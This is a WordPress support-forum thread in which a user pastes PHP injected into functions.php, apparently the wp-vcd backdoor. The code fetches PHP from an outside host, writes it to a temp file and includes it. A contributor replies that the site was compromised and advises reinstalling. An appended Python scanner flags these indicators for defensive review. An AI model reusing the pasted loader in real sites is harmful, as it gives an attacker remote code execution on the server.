• Resolved fabios83

    (@fabios83)


    Hi everyone,

    When I install and activate your plugin, my site alerts me to a suspicious file write in wp-includes and a modified functions.php.

    for example: wp-includes/class.wp.php

    functions.php has this and other lines added:

    
    if ( ! function_exists( 'theme_temp_setup' ) ) {  
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
    
    if($tmpcontent = @file_get_contents("http://www.spekt.cc/code2.php?i=".$path))
    {
    
    function theme_temp_setup($phpCode) {
        $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
        $handle = fopen($tmpfname, "w+");
        fwrite($handle, "<?php\n" . $phpCode);
        fclose($handle);
        include $tmpfname;
        unlink($tmpfname);
        return get_defined_vars();
    }
    

    Please, can you check the security integrity?

    Best regards

Viewing 1 replies (of 1 total)
  • Plugin Contributor Ewout

    (@pomegranate)

    Hello Fabios,
    It looks like your site has been compromised. When this happens, hackers often create code that infects multiple (or all) plugins and often also core WordPress files, so that you will need to reinstall clean versions of all plugins and also WordPress itself. I also recommend checking if there are any unknown admin accounts and changing all passwords for your own admin accounts.

    The code that you posted appears to match what’s described in this article: https://medium.com/@rakshitshah/wordpress-wp-vcd-malware-attack-e7394801895d

    This code is not coming from the WooCommerce PDF Invoices & Packing Slips plugin. We recently fixed a potential XSS vulnerability (in version 2.0.13), but that was a minor issue that could only be exploited by users that already had full admin access – in which case a lot more damage can be done even without the vulnerability. We are not aware of any current vulnerabilities but we always monitor this closely.

    Good luck getting your site back online, I hope this will be resolved quickly!
    Ewout
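
Added example, not part of the thread and not code from the plugin or its authors: a small scanner that walks a WordPress directory and lists PHP files carrying the indicators visible in the posted snippet (the `theme_temp_setup` marker, a remote `file_get_contents` fetch, a temp file that is written and then included) plus the `wp-includes/class.wp.php` path the poster reported. The function names and the sample tree are constructed for illustration; a hit is a file to review and replace from a clean copy, not a verdict.

```python
import re
import tempfile
from pathlib import Path

# Content indicators taken from the snippet quoted in the thread.
CONTENT_INDICATORS = {
    "theme_temp_setup marker": re.compile(rb"theme_temp_setup"),
    "remote fetch into PHP": re.compile(rb"file_get_contents\s*\(\s*[\"']https?://", re.I),
    "temp file written then included": re.compile(rb"tempnam\s*\(.*?\binclude\s+\$\w+", re.I | re.S),
}
# File the poster reported as a suspicious write (relative to the WordPress root).
PATH_INDICATORS = {"wp-includes/class.wp.php"}


def scan_wordpress_tree(root):
    """Return {relative_path: [reasons]} for PHP files matching any indicator."""
    root = Path(root)
    findings = {}
    for path in sorted(p for p in root.rglob("*.php") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        reasons = ["path reported in the thread"] if rel in PATH_INDICATORS else []
        try:
            data = path.read_bytes()
        except OSError as exc:  # unreadable files are worth a look too
            reasons.append(f"unreadable: {exc.strerror}")
            data = b""
        reasons += [name for name, rx in CONTENT_INDICATORS.items() if rx.search(data)]
        if reasons:
            findings[rel] = reasons
    return findings


def build_sample_tree(root):
    """Constructed sample tree: one clean core file, two files carrying indicators."""
    root = Path(root)
    (root / "wp-includes").mkdir(parents=True)
    (root / "wp-content/themes/demo").mkdir(parents=True)
    (root / "wp-includes/class-wp.php").write_text("<?php class WP {}\n")
    (root / "wp-includes/class.wp.php").write_text("<?php // constructed sample\n")
    (root / "wp-content/themes/demo/functions.php").write_text(
        "<?php\nif ( ! function_exists( 'theme_temp_setup' ) ) {\n"
        "if($c = @file_get_contents(\"http://example.invalid/x?i=\".$p)) {} }\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reasons in scan_wordpress_tree(tmp).items():
            print(f"{rel}: {', '.join(reasons)}")
```

On a real site, pass the WordPress root to `scan_wordpress_tree` and compare every flagged file against a fresh download of the same WordPress, theme or plugin version.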


The topic ‘Hacked Version’ is closed to new replies.